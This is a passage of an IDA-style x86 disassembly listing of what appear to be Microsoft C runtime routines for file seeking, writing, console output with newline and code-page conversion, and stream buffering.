arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
mov ecx, [eax+3Ch]
add ecx, eax
movzx eax, word ptr [ecx+14h]
push ebx
push esi
movzx esi, word ptr [ecx+6]
xor edx, edx
test esi, esi
push edi
lea eax, [eax+ecx+18h]
jbe short loc_40CC4C
mov edi, [esp+0Ch+arg_4]
loc_40CC32: ; CODE XREF: sub_40CC10+3A�j
mov ecx, [eax+0Ch]
cmp edi, ecx
jb short loc_40CC42
mov ebx, [eax+8]
add ebx, ecx
cmp edi, ebx
jb short loc_40CC4E
loc_40CC42: ; CODE XREF: sub_40CC10+27�j
add edx, 1
add eax, 28h
cmp edx, esi
jb short loc_40CC32
loc_40CC4C: ; CODE XREF: sub_40CC10+1C�j
xor eax, eax
loc_40CC4E: ; CODE XREF: sub_40CC10+30�j
pop edi
pop esi
pop ebx
retn
sub_40CC10 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CC52 proc near ; CODE XREF: sub_406640+FF�p
; sub_407979+E�p ...
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 8
push offset dword_421780
call __SEH_prolog4
and [ebp+ms_exc.disabled], 0
mov edx, 400000h
push edx
call sub_40CBE0
pop ecx
test eax, eax
jz short loc_40CCAF
mov eax, [ebp+arg_0]
sub eax, edx
push eax
push edx
call sub_40CC10
pop ecx
pop ecx
test eax, eax
jz short loc_40CCAF
mov eax, [eax+24h]
shr eax, 1Fh
not eax
and eax, 1
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
jmp short loc_40CCB8
; ---------------------------------------------------------------------------
mov eax, [ebp+ms_exc.exc_ptr]
mov eax, [eax]
mov eax, [eax]
xor ecx, ecx
cmp eax, 0C0000005h
setz cl
mov eax, ecx
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+ms_exc.old_esp]
loc_40CCAF: ; CODE XREF: sub_40CC52+1E�j
; sub_40CC52+30�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
xor eax, eax
loc_40CCB8: ; CODE XREF: sub_40CC52+44�j
call __SEH_epilog4
retn
sub_40CC52 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CCBE proc near ; CODE XREF: sub_409DAD+2EE�p
; sub_409DAD+3C8�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_4]
push esi
mov esi, [ebp+arg_0]
mov [ebp+var_8], eax
mov eax, [ebp+arg_8]
push edi
push esi
mov [ebp+var_4], eax
call sub_40ED7D
or edi, 0FFFFFFFFh
cmp eax, edi
pop ecx
jnz short loc_40CCF3
call sub_4057D3
mov dword ptr [eax], 9
loc_40CCED: ; CODE XREF: sub_40CCBE+5E�j
mov eax, edi
mov edx, edi
jmp short loc_40CD3D
; ---------------------------------------------------------------------------
loc_40CCF3: ; CODE XREF: sub_40CCBE+22�j
push [ebp+arg_C]
lea ecx, [ebp+var_4]
push ecx
push [ebp+var_8]
push eax
call ds:dword_41D074 ; SetFilePointer
cmp eax, edi
mov [ebp+var_8], eax
jnz short loc_40CD1E
call ds:dword_41D0F0 ; RtlGetLastWin32Error
test eax, eax
jz short loc_40CD1E
push eax
call sub_4057F9
pop ecx
jmp short loc_40CCED
; ---------------------------------------------------------------------------
loc_40CD1E: ; CODE XREF: sub_40CCBE+4B�j
; sub_40CCBE+55�j
mov eax, esi
and esi, 1Fh
imul esi, 28h
sar eax, 5
mov eax, dword_433CA0[eax*4]
lea eax, [eax+esi+4]
and byte ptr [eax], 0FDh
mov eax, [ebp+var_8]
mov edx, [ebp+var_4]
loc_40CD3D: ; CODE XREF: sub_40CCBE+33�j
pop edi
pop esi
leave
retn
sub_40CCBE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CD41 proc near ; CODE XREF: sub_4067D6+116�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push 14h
push offset dword_4217A0
call __SEH_prolog4
or esi, 0FFFFFFFFh
mov [ebp+var_24], esi
mov [ebp+var_20], esi
mov eax, [ebp+arg_0]
cmp eax, 0FFFFFFFEh
jnz short loc_40CD7A
call sub_4057E6
and dword ptr [eax], 0
call sub_4057D3
mov dword ptr [eax], 9
loc_40CD71: ; CODE XREF: sub_40CD41+66�j
mov eax, esi
mov edx, esi
jmp loc_40CE4A
; ---------------------------------------------------------------------------
loc_40CD7A: ; CODE XREF: sub_40CD41+1B�j
xor edi, edi
cmp eax, edi
jl short loc_40CD88
cmp eax, dword_433C84
jb short loc_40CDA9
loc_40CD88: ; CODE XREF: sub_40CD41+3D�j
call sub_4057E6
mov [eax], edi
call sub_4057D3
mov dword ptr [eax], 9
push edi
push edi
push edi
push edi
push edi
call sub_402F39
add esp, 14h
jmp short loc_40CD71
; ---------------------------------------------------------------------------
loc_40CDA9: ; CODE XREF: sub_40CD41+45�j
mov ecx, eax
sar ecx, 5
lea ebx, ds:433CA0h[ecx*4]
mov esi, eax
and esi, 1Fh
imul esi, 28h
mov ecx, [ebx]
movzx ecx, byte ptr [ecx+esi+4]
and ecx, 1
jnz short loc_40CDEF
call sub_4057E6
mov [eax], edi
call sub_4057D3
mov dword ptr [eax], 9
push edi
push edi
push edi
push edi
push edi
call sub_402F39
add esp, 14h
or edx, 0FFFFFFFFh
mov eax, edx
jmp short loc_40CE4A
; ---------------------------------------------------------------------------
loc_40CDEF: ; CODE XREF: sub_40CD41+86�j
push eax
call sub_40EDEE
pop ecx
mov [ebp+ms_exc.disabled], edi
mov eax, [ebx]
test byte ptr [eax+esi+4], 1
jz short loc_40CE1E
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40CCBE
add esp, 10h
mov [ebp+var_24], eax
mov [ebp+var_20], edx
jmp short loc_40CE38
; ---------------------------------------------------------------------------
loc_40CE1E: ; CODE XREF: sub_40CD41+BF�j
call sub_4057D3
mov dword ptr [eax], 9
call sub_4057E6
mov [eax], edi
or [ebp+var_24], 0FFFFFFFFh
or [ebp+var_20], 0FFFFFFFFh
loc_40CE38: ; CODE XREF: sub_40CD41+DB�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_40CE50
mov eax, [ebp+var_24]
mov edx, [ebp+var_20]
loc_40CE4A: ; CODE XREF: sub_40CD41+34�j
; sub_40CD41+AC�j
call __SEH_epilog4
retn
sub_40CD41 endp
; =============== S U B R O U T I N E =======================================
sub_40CE50 proc near ; CODE XREF: sub_40CD41+FE�p
; DATA XREF: .rdata:004217B8�o
push dword ptr [ebp+8]
call sub_40EE8E
pop ecx
retn
sub_40CE50 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=518h
sub_40CE5A proc near ; CODE XREF: sub_40D420+9A�p
; sub_4105A7+BB�p
var_594 = dword ptr -594h
var_590 = dword ptr -590h
var_58C = dword ptr -58Ch
var_588 = dword ptr -588h
var_584 = dword ptr -584h
var_580 = dword ptr -580h
var_57C = dword ptr -57Ch
var_578 = dword ptr -578h
var_574 = dword ptr -574h
var_56D = byte ptr -56Dh
var_56C = dword ptr -56Ch
var_568 = dword ptr -568h
var_564 = byte ptr -564h
var_410 = byte ptr -410h
var_160 = byte ptr -160h
var_C = byte ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
lea ebp, [esp-518h]
sub esp, 594h
mov eax, dword_423064
xor eax, ebp
mov [ebp+518h+var_4], eax
mov eax, [ebp+518h+arg_4]
push esi
xor esi, esi
cmp [ebp+518h+arg_8], esi
mov [ebp+518h+var_57C], eax
mov [ebp+518h+var_578], esi
mov [ebp+518h+var_580], esi
jnz short loc_40CE96
xor eax, eax
jmp loc_40D40A
; ---------------------------------------------------------------------------
loc_40CE96: ; CODE XREF: sub_40CE5A+33�j
cmp eax, esi
jnz short loc_40CEC1
call sub_4057E6
mov [eax], esi
call sub_4057D3
push esi
push esi
push esi
push esi
push esi
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
or eax, 0FFFFFFFFh
jmp loc_40D40A
; ---------------------------------------------------------------------------
loc_40CEC1: ; CODE XREF: sub_40CE5A+3E�j
mov esi, [ebp+518h+arg_0]
push ebx
mov ebx, esi
and ebx, 1Fh
imul ebx, 28h
mov eax, esi
sar eax, 5
push edi
lea edi, ds:433CA0h[eax*4]
mov eax, [edi]
add eax, ebx
mov cl, [eax+24h]
add cl, cl
sar cl, 1
cmp cl, 2
mov [ebp+518h+var_588], edi
mov [ebp+518h+var_56D], cl
jz short loc_40CEF8
cmp cl, 1
jnz short loc_40CF2B
loc_40CEF8: ; CODE XREF: sub_40CE5A+97�j
mov ecx, [ebp+518h+arg_8]
not ecx
test cl, 1
jnz short loc_40CF2B
call sub_4057E6
xor esi, esi
mov [eax], esi
call sub_4057D3
push esi
push esi
push esi
push esi
push esi
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
jmp loc_40D400
; ---------------------------------------------------------------------------
loc_40CF2B: ; CODE XREF: sub_40CE5A+9C�j
; sub_40CE5A+A9�j
test byte ptr [eax+4], 20h
jz short loc_40CF40
push 2
push 0
push 0
push esi
call sub_40CCBE
add esp, 10h
loc_40CF40: ; CODE XREF: sub_40CE5A+D5�j
push esi
call sub_40D540
test eax, eax
pop ecx
jz loc_40D145
mov eax, [edi]
test byte ptr [ebx+eax+4], 80h
jz loc_40D145
call sub_40539D
mov eax, [eax+6Ch]
xor ecx, ecx
cmp [eax+14h], ecx
lea eax, [ebp+518h+var_594]
setz cl
push eax
mov eax, [edi]
push dword ptr [ebx+eax]
mov esi, ecx
call ds:dword_41D118 ; GetConsoleMode
test eax, eax
jz loc_40D145
test esi, esi
jz short loc_40CF93
cmp [ebp+518h+var_56D], 0
jz loc_40D145
loc_40CF93: ; CODE XREF: sub_40CE5A+12D�j
call ds:dword_41D11C ; GetConsoleCP
and [ebp+518h+var_568], 0
cmp [ebp+518h+arg_8], 0
mov esi, [ebp+518h+var_57C]
mov [ebp+518h+var_594], eax
mov [ebp+518h+var_58C], esi
jbe loc_40D3B2
and [ebp+518h+var_574], 0
jmp short loc_40CFBC
; ---------------------------------------------------------------------------
loc_40CFB9: ; CODE XREF: sub_40CE5A+2E0�j
mov esi, [ebp+518h+var_58C]
loc_40CFBC: ; CODE XREF: sub_40CE5A+15D�j
mov al, [ebp+518h+var_56D]
test al, al
jnz loc_40D0CD
mov al, [esi]
xor ecx, ecx
cmp al, 0Ah
setz cl
movsx eax, al
push eax
mov [ebp+518h+var_590], ecx
call sub_40CA36
test eax, eax
pop ecx
jnz short loc_40CFFB
push 1
lea eax, [ebp+518h+var_56C]
push esi
push eax
call sub_40F4D0
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz loc_40D3A8
jmp short loc_40D02B
; ---------------------------------------------------------------------------
loc_40CFFB: ; CODE XREF: sub_40CE5A+185�j
mov eax, [ebp+518h+var_57C]
sub eax, esi
add eax, [ebp+518h+arg_8]
cmp eax, 1
jbe loc_40D3A8
push 2
lea eax, [ebp+518h+var_56C]
push esi
push eax
call sub_40F4D0
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz loc_40D3A8
inc esi
inc [ebp+518h+var_574]
loc_40D02B: ; CODE XREF: sub_40CE5A+19F�j
xor eax, eax
push eax
push eax
push 5
lea ecx, [ebp+518h+var_C]
push ecx
push 1
lea ecx, [ebp+518h+var_56C]
push ecx
push eax
push [ebp+518h+var_594]
inc esi
inc [ebp+518h+var_574]
mov [ebp+518h+var_58C], esi
call ds:dword_41D138 ; WideCharToMultiByte
mov esi, eax
test esi, esi
jz loc_40D3A8
push 0
lea eax, [ebp+518h+var_568]
push eax
push esi
lea eax, [ebp+518h+var_C]
push eax
mov eax, [edi]
push dword ptr [ebx+eax]
call ds:dword_41D088 ; WriteFile
test eax, eax
jz loc_40D39F
mov eax, [ebp+518h+var_568]
add [ebp+518h+var_578], eax
cmp eax, esi
jl loc_40D3A8
cmp [ebp+518h+var_590], 0
jz loc_40D131
push 0
lea eax, [ebp+518h+var_568]
push eax
push 1
lea eax, [ebp+518h+var_C]
push eax
mov eax, [edi]
mov [ebp+518h+var_C], 0Dh
push dword ptr [ebx+eax]
call ds:dword_41D088 ; WriteFile
test eax, eax
jz loc_40D39F
cmp [ebp+518h+var_568], 1
jl loc_40D3A8
inc [ebp+518h+var_580]
inc [ebp+518h+var_578]
jmp short loc_40D131
; ---------------------------------------------------------------------------
loc_40D0CD: ; CODE XREF: sub_40CE5A+167�j
cmp al, 1
jz short loc_40D0D5
cmp al, 2
jnz short loc_40D0F0
loc_40D0D5: ; CODE XREF: sub_40CE5A+275�j
movzx ecx, word ptr [esi]
xor edx, edx
cmp cx, 0Ah
setz dl
inc esi
inc esi
add [ebp+518h+var_574], 2
mov [ebp+518h+var_56C], ecx
mov [ebp+518h+var_58C], esi
mov [ebp+518h+var_590], edx
loc_40D0F0: ; CODE XREF: sub_40CE5A+279�j
cmp al, 1
jz short loc_40D0F8
cmp al, 2
jnz short loc_40D131
loc_40D0F8: ; CODE XREF: sub_40CE5A+298�j
push [ebp+518h+var_56C]
call sub_4104DC
cmp ax, word ptr [ebp+518h+var_56C]
pop ecx
jnz loc_40D39F
inc [ebp+518h+var_578]
cmp [ebp+518h+var_590], 0
jz short loc_40D131
push 0Dh
pop eax
push eax
mov [ebp+518h+var_56C], eax
call sub_4104DC
cmp ax, word ptr [ebp+518h+var_56C]
pop ecx
jnz loc_40D39F
inc [ebp+518h+var_578]
inc [ebp+518h+var_580]
loc_40D131: ; CODE XREF: sub_40CE5A+232�j
; sub_40CE5A+271�j ...
mov eax, [ebp+518h+arg_8]
cmp [ebp+518h+var_574], eax
jb loc_40CFB9
jmp loc_40D3A8
; ---------------------------------------------------------------------------
loc_40D145: ; CODE XREF: sub_40CE5A+EF�j
; sub_40CE5A+FC�j ...
mov eax, [edi]
add eax, ebx
test byte ptr [eax+4], 80h
jz loc_40D378
mov eax, [ebp+518h+var_57C]
xor esi, esi
cmp [ebp+518h+var_56D], 0
mov [ebp+518h+var_56C], esi
jnz loc_40D1F6
cmp [ebp+518h+arg_8], esi
mov [ebp+518h+var_568], eax
jbe loc_40D3D9
loc_40D174: ; CODE XREF: sub_40CE5A+395�j
mov ecx, [ebp+518h+var_568]
and [ebp+518h+var_574], 0
sub ecx, [ebp+518h+var_57C]
lea eax, [ebp+518h+var_564]
loc_40D181: ; CODE XREF: sub_40CE5A+354�j
cmp ecx, [ebp+518h+arg_8]
jnb short loc_40D1B0
mov edx, [ebp+518h+var_568]
inc [ebp+518h+var_568]
mov dl, [edx]
inc ecx
cmp dl, 0Ah
jnz short loc_40D1A1
inc [ebp+518h+var_580]
mov byte ptr [eax], 0Dh
inc eax
inc [ebp+518h+var_574]
loc_40D1A1: ; CODE XREF: sub_40CE5A+33B�j
mov [eax], dl
inc eax
inc [ebp+518h+var_574]
cmp [ebp+518h+var_574], 400h
jb short loc_40D181
loc_40D1B0: ; CODE XREF: sub_40CE5A+32D�j
mov esi, eax
lea eax, [ebp+518h+var_564]
sub esi, eax
push 0
lea eax, [ebp+518h+var_584]
push eax
push esi
lea eax, [ebp+518h+var_564]
push eax
mov eax, [edi]
push dword ptr [ebx+eax]
call ds:dword_41D088 ; WriteFile
test eax, eax
jz loc_40D39F
mov eax, [ebp+518h+var_584]
add [ebp+518h+var_578], eax
cmp eax, esi
jl loc_40D3A8
mov eax, [ebp+518h+var_568]
sub eax, [ebp+518h+var_57C]
cmp eax, [ebp+518h+arg_8]
jb short loc_40D174
jmp loc_40D3A8
; ---------------------------------------------------------------------------
loc_40D1F6: ; CODE XREF: sub_40CE5A+305�j
cmp [ebp+518h+var_56D], 2
jnz loc_40D29D
cmp [ebp+518h+arg_8], esi
mov [ebp+518h+var_568], eax
jbe loc_40D3D9
loc_40D20F: ; CODE XREF: sub_40CE5A+438�j
mov ecx, [ebp+518h+var_568]
xor esi, esi
sub ecx, [ebp+518h+var_57C]
lea eax, [ebp+518h+var_564]
loc_40D21A: ; CODE XREF: sub_40CE5A+3F7�j
cmp ecx, [ebp+518h+arg_8]
jnb short loc_40D253
mov edx, [ebp+518h+var_568]
add [ebp+518h+var_568], 2
movzx edx, word ptr [edx]
inc ecx
inc ecx
cmp dx, 0Ah
jnz short loc_40D241
add [ebp+518h+var_580], 2
mov word ptr [eax], 0Dh
inc eax
inc eax
inc esi
inc esi
loc_40D241: ; CODE XREF: sub_40CE5A+3D8�j
mov edi, [ebp+518h+var_588]
mov [eax], dx
inc eax
inc eax
inc esi
inc esi
cmp esi, 3FFh
jb short loc_40D21A
loc_40D253: ; CODE XREF: sub_40CE5A+3C6�j
mov esi, eax
lea eax, [ebp+518h+var_564]
sub esi, eax
push 0
lea eax, [ebp+518h+var_584]
push eax
push esi
lea eax, [ebp+518h+var_564]
push eax
mov eax, [edi]
push dword ptr [ebx+eax]
call ds:dword_41D088 ; WriteFile
test eax, eax
jz loc_40D39F
mov eax, [ebp+518h+var_584]
add [ebp+518h+var_578], eax
cmp eax, esi
jl loc_40D3A8
mov eax, [ebp+518h+var_568]
sub eax, [ebp+518h+var_57C]
cmp eax, [ebp+518h+arg_8]
jb loc_40D20F
jmp loc_40D3A8
; ---------------------------------------------------------------------------
loc_40D29D: ; CODE XREF: sub_40CE5A+3A0�j
cmp [ebp+518h+arg_8], esi
mov [ebp+518h+var_574], eax
jbe loc_40D3D9
loc_40D2AC: ; CODE XREF: sub_40CE5A+516�j
mov ecx, [ebp+518h+var_574]
and [ebp+518h+var_568], 0
sub ecx, [ebp+518h+var_57C]
push 2
lea eax, [ebp+518h+var_160]
pop esi
loc_40D2BF: ; CODE XREF: sub_40CE5A+497�j
cmp ecx, [ebp+518h+arg_8]
jnb short loc_40D2F3
mov edx, [ebp+518h+var_574]
movzx edx, word ptr [edx]
add [ebp+518h+var_574], esi
add ecx, esi
cmp dx, 0Ah
jnz short loc_40D2E2
mov word ptr [eax], 0Dh
add eax, esi
add [ebp+518h+var_568], esi
loc_40D2E2: ; CODE XREF: sub_40CE5A+47C�j
add [ebp+518h+var_568], esi
mov [eax], dx
add eax, esi
cmp [ebp+518h+var_568], 152h
jb short loc_40D2BF
loc_40D2F3: ; CODE XREF: sub_40CE5A+46B�j
xor esi, esi
push esi
push esi
push 2ABh
lea ecx, [ebp+518h+var_410]
push ecx
lea ecx, [ebp+518h+var_160]
sub eax, ecx
cdq
sub eax, edx
sar eax, 1
push eax
mov eax, ecx
push eax
push esi
push 0FDE9h
call ds:dword_41D138 ; WideCharToMultiByte
mov edi, eax
cmp edi, esi
jz short loc_40D39F
loc_40D326: ; CODE XREF: sub_40CE5A+4F6�j
push 0
lea eax, [ebp+518h+var_584]
push eax
mov eax, edi
sub eax, esi
push eax
lea eax, [ebp+esi+518h+var_410]
push eax
mov eax, [ebp+518h+var_588]
mov eax, [eax]
push dword ptr [ebx+eax]
call ds:dword_41D088 ; WriteFile
test eax, eax
jz short loc_40D354
add esi, [ebp+518h+var_584]
cmp edi, esi
jg short loc_40D326
jmp short loc_40D35D
; ---------------------------------------------------------------------------
loc_40D354: ; CODE XREF: sub_40CE5A+4EF�j
call ds:dword_41D0F0 ; RtlGetLastWin32Error
mov [ebp+518h+var_56C], eax
loc_40D35D: ; CODE XREF: sub_40CE5A+4F8�j
cmp edi, esi
jg short loc_40D3A8
mov eax, [ebp+518h+var_574]
sub eax, [ebp+518h+var_57C]
cmp eax, [ebp+518h+arg_8]
mov [ebp+518h+var_578], eax
jb loc_40D2AC
jmp short loc_40D3A8
; ---------------------------------------------------------------------------
loc_40D378: ; CODE XREF: sub_40CE5A+2F3�j
push 0
lea ecx, [ebp+518h+var_584]
push ecx
push [ebp+518h+arg_8]
push [ebp+518h+var_57C]
push dword ptr [eax]
call ds:dword_41D088 ; WriteFile
test eax, eax
jz short loc_40D39F
mov eax, [ebp+518h+var_584]
and [ebp+518h+var_56C], 0
mov [ebp+518h+var_578], eax
jmp short loc_40D3A8
; ---------------------------------------------------------------------------
loc_40D39F: ; CODE XREF: sub_40CE5A+21A�j
; sub_40CE5A+25B�j ...
call ds:dword_41D0F0 ; RtlGetLastWin32Error
mov [ebp+518h+var_56C], eax
loc_40D3A8: ; CODE XREF: sub_40CE5A+199�j
; sub_40CE5A+1AF�j ...
mov eax, [ebp+518h+var_578]
test eax, eax
jnz short loc_40D405
mov edi, [ebp+518h+var_588]
loc_40D3B2: ; CODE XREF: sub_40CE5A+153�j
xor esi, esi
cmp [ebp+518h+var_56C], esi
jz short loc_40D3D9
push 5
pop esi
cmp [ebp+518h+var_56C], esi
jnz short loc_40D3CE
call sub_4057D3
mov dword ptr [eax], 9
jmp short loc_40D3F9
; ---------------------------------------------------------------------------
loc_40D3CE: ; CODE XREF: sub_40CE5A+565�j
push [ebp+518h+var_56C]
call sub_4057F9
pop ecx
jmp short loc_40D400
; ---------------------------------------------------------------------------
loc_40D3D9: ; CODE XREF: sub_40CE5A+314�j
; sub_40CE5A+3AF�j ...
mov eax, [edi]
test byte ptr [ebx+eax+4], 40h
jz short loc_40D3EE
mov eax, [ebp+518h+var_57C]
cmp byte ptr [eax], 1Ah
jnz short loc_40D3EE
xor eax, eax
jmp short loc_40D408
; ---------------------------------------------------------------------------
loc_40D3EE: ; CODE XREF: sub_40CE5A+586�j
; sub_40CE5A+58E�j
call sub_4057D3
mov dword ptr [eax], 1Ch
loc_40D3F9: ; CODE XREF: sub_40CE5A+572�j
call sub_4057E6
mov [eax], esi
loc_40D400: ; CODE XREF: sub_40CE5A+CC�j
; sub_40CE5A+57D�j
or eax, 0FFFFFFFFh
jmp short loc_40D408
; ---------------------------------------------------------------------------
loc_40D405: ; CODE XREF: sub_40CE5A+553�j
sub eax, [ebp+518h+var_580]
loc_40D408: ; CODE XREF: sub_40CE5A+592�j
; sub_40CE5A+5A9�j
pop edi
pop ebx
loc_40D40A: ; CODE XREF: sub_40CE5A+37�j
; sub_40CE5A+62�j
mov ecx, [ebp+518h+var_4]
xor ecx, ebp
pop esi
call sub_402710
add ebp, 518h
leave
retn
sub_40CE5A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D420 proc near ; CODE XREF: sub_4067D6+CB�p
; sub_4067D6+13A�p ...
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push 10h
push offset dword_4217C0
call __SEH_prolog4
mov eax, [ebp+arg_0]
cmp eax, 0FFFFFFFEh
jnz short loc_40D44F
call sub_4057E6
and dword ptr [eax], 0
call sub_4057D3
mov dword ptr [eax], 9
loc_40D447: ; CODE XREF: sub_40D420+5C�j
or eax, 0FFFFFFFFh
jmp loc_40D4EC
; ---------------------------------------------------------------------------
loc_40D44F: ; CODE XREF: sub_40D420+12�j
xor edi, edi
cmp eax, edi
jl short loc_40D45D
cmp eax, dword_433C84
jb short loc_40D47E
loc_40D45D: ; CODE XREF: sub_40D420+33�j
; sub_40D420+7C�j
call sub_4057E6
mov [eax], edi
call sub_4057D3
mov dword ptr [eax], 9
push edi
push edi
push edi
push edi
push edi
call sub_402F39
add esp, 14h
jmp short loc_40D447
; ---------------------------------------------------------------------------
loc_40D47E: ; CODE XREF: sub_40D420+3B�j
mov ecx, eax
sar ecx, 5
lea ebx, ds:433CA0h[ecx*4]
mov esi, eax
and esi, 1Fh
imul esi, 28h
mov ecx, [ebx]
movzx ecx, byte ptr [ecx+esi+4]
and ecx, 1
jz short loc_40D45D
push eax
call sub_40EDEE
pop ecx
mov [ebp+ms_exc.disabled], edi
mov eax, [ebx]
test byte ptr [eax+esi+4], 1
jz short loc_40D4C7
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40CE5A
add esp, 0Ch
mov [ebp+var_1C], eax
jmp short loc_40D4DD
; ---------------------------------------------------------------------------
loc_40D4C7: ; CODE XREF: sub_40D420+8F�j
call sub_4057D3
mov dword ptr [eax], 9
call sub_4057E6
mov [eax], edi
or [ebp+var_1C], 0FFFFFFFFh
loc_40D4DD: ; CODE XREF: sub_40D420+A5�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_40D4F2
mov eax, [ebp+var_1C]
loc_40D4EC: ; CODE XREF: sub_40D420+2A�j
call __SEH_epilog4
retn
sub_40D420 endp
; =============== S U B R O U T I N E =======================================
sub_40D4F2 proc near ; CODE XREF: sub_40D420+C4�p
; DATA XREF: .rdata:004217D8�o
push dword ptr [ebp+8]
call sub_40EE8E
pop ecx
retn
sub_40D4F2 endp
; =============== S U B R O U T I N E =======================================
sub_40D4FC proc near ; CODE XREF: sub_4067D6+9C�p
; sub_409C8D+58�p ...
arg_0 = dword ptr 4
inc dword_425FC8
push 1000h
call sub_40773A
test eax, eax
pop ecx
mov ecx, [esp+arg_0]
mov [ecx+8], eax
jz short loc_40D525
or dword ptr [ecx+0Ch], 8
mov dword ptr [ecx+18h], 1000h
jmp short loc_40D536
; ---------------------------------------------------------------------------
loc_40D525: ; CODE XREF: sub_40D4FC+1A�j
or dword ptr [ecx+0Ch], 4
lea eax, [ecx+14h]
mov [ecx+8], eax
mov dword ptr [ecx+18h], 2
loc_40D536: ; CODE XREF: sub_40D4FC+27�j
mov eax, [ecx+8]
and dword ptr [ecx+4], 0
mov [ecx], eax
retn
sub_40D4FC endp
; =============== S U B R O U T I N E =======================================
sub_40D540 proc near ; CODE XREF: sub_4067D6+91�p
; sub_40871B+C�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, 0FFFFFFFEh
jnz short loc_40D557
call sub_4057D3
mov dword ptr [eax], 9
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_40D557: ; CODE XREF: sub_40D540+7�j
push esi
xor esi, esi
cmp eax, esi
jl short loc_40D566
cmp eax, dword_433C84
jb short loc_40D582
loc_40D566: ; CODE XREF: sub_40D540+1C�j
call sub_4057D3
push esi
push esi
push esi
push esi
push esi
mov dword ptr [eax], 9
call sub_402F39
add esp, 14h
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_40D582: ; CODE XREF: sub_40D540+24�j
mov ecx, eax
and eax, 1Fh
imul eax, 28h
sar ecx, 5
mov ecx, dword_433CA0[ecx*4]
movzx eax, byte ptr [ecx+eax+4]
and eax, 40h
pop esi
retn
sub_40D540 endp
; =============== S U B R O U T I N E =======================================
sub_40D59E proc near ; CODE XREF: sub_407979:loc_40799C�p
push esi
push edi
xor edi, edi
loc_40D5A2: ; CODE XREF: sub_40D59E+1A�j
lea esi, off_423F80[edi]
push dword ptr [esi]
call sub_405127
add edi, 4
cmp edi, 28h
pop ecx
mov [esi], eax
jb short loc_40D5A2
pop edi
pop esi
retn
sub_40D59E endp
; =============== S U B R O U T I N E =======================================
sub_40D5BD proc near ; CODE XREF: sub_4069D7+554�p
mov eax, dword_423064
or eax, 1
xor ecx, ecx
cmp dword_426420, eax
setz cl
mov eax, ecx
retn
sub_40D5BD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D5D3 proc near ; CODE XREF: sub_40D732+12�p
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = word ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
mov esi, [ebp+arg_4]
xor ebx, ebx
cmp esi, ebx
push edi
mov edi, [ebp+arg_8]
jnz short loc_40D5F9
cmp edi, ebx
jbe short loc_40D5F9
mov eax, [ebp+arg_0]
cmp eax, ebx
jz short loc_40D5F5
mov [eax], ebx
loc_40D5F5: ; CODE XREF: sub_40D5D3+1E�j
; sub_40D5D3+EC�j ...
xor eax, eax
jmp short loc_40D678
; ---------------------------------------------------------------------------
loc_40D5F9: ; CODE XREF: sub_40D5D3+13�j
; sub_40D5D3+17�j
mov eax, [ebp+arg_0]
cmp eax, ebx
jz short loc_40D603
or dword ptr [eax], 0FFFFFFFFh
loc_40D603: ; CODE XREF: sub_40D5D3+2B�j
cmp edi, 7FFFFFFFh
jbe short loc_40D626
call sub_4057D3
push 16h
pop esi
push ebx
push ebx
push ebx
push ebx
push ebx
mov [eax], esi
call sub_402F39
add esp, 14h
loc_40D622: ; CODE XREF: sub_40D5D3+CC�j
; sub_40D5D3+D5�j
mov eax, esi
jmp short loc_40D678
; ---------------------------------------------------------------------------
loc_40D626: ; CODE XREF: sub_40D5D3+36�j
push [ebp+arg_10]
lea ecx, [ebp+var_10]
call sub_40271F
mov eax, [ebp+var_10]
cmp [eax+14h], ebx
jnz loc_40D6D1
mov ax, [ebp+arg_C]
cmp ax, 0FFh
jbe short loc_40D67D
cmp esi, ebx
jz short loc_40D65A
cmp edi, ebx
jbe short loc_40D65A
push edi
push ebx
push esi
call sub_407B70
add esp, 0Ch
loc_40D65A: ; CODE XREF: sub_40D5D3+76�j
; sub_40D5D3+7A�j ...
call sub_4057D3
mov dword ptr [eax], 2Ah
call sub_4057D3
cmp [ebp+var_4], bl
mov eax, [eax]
jz short loc_40D678
mov ecx, [ebp+var_8]
and dword ptr [ecx+70h], 0FFFFFFFDh
loc_40D678: ; CODE XREF: sub_40D5D3+24�j
; sub_40D5D3+51�j ...
pop edi
pop esi
pop ebx
leave
retn
